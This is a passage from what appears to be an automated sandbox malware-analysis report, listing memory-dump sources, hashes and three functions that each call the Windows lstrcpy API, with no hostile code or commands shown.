                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: a6064c7cc904e1e4600ff63448285b092cc40db9da497c31f050ee0e27b8e6a3
                                    • Instruction ID: 08ab8f4f19fb8836bcd4f35a4874615376191f2ddce6aa1e93c887ad906ac74e
                                    • Opcode Fuzzy Hash: a6064c7cc904e1e4600ff63448285b092cc40db9da497c31f050ee0e27b8e6a3
                                    • Instruction Fuzzy Hash: E231D674A01F029FC764DF7AD588992BBF5BF49700B00492EA896C7B50DB30F851CB80
                                    Function 000C1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 000C15A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C15D9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1611
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1649
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 37e6a00466467951c877dfa0bd6dbf9b5e62351ba81a7632028716b2a36d8945
                                    • Instruction ID: 390b1f3dafa216645d62138a05e8e8e355a7d694ae59e2d0f65339ab5bfcc74d
                                    • Opcode Fuzzy Hash: 37e6a00466467951c877dfa0bd6dbf9b5e62351ba81a7632028716b2a36d8945
                                    • Instruction Fuzzy Hash: B9211974601B029FDB64DF6AD458F5BB7F4AF46700B044A2DA49AC7A42EB30F841CB90
                                    Function 000A1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 000A162D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A164F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1671
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 50524da7761b829517fb13d7a7d46ffc36d1786b03056b0820377124b2f2fa34
                                    • Instruction ID: 991d45ba5077794bdd06f66099ca35f84fa2be900413420c5c6c058b75870d72
                                    • Opcode Fuzzy Hash: 50524da7761b829517fb13d7a7d46ffc36d1786b03056b0820377124b2f2fa34
                                    • Instruction Fuzzy Hash: 9F110074A12B039BDB64DFB9D45C967B7F9FF46701B08452DA49AC7A40EB30E841CB90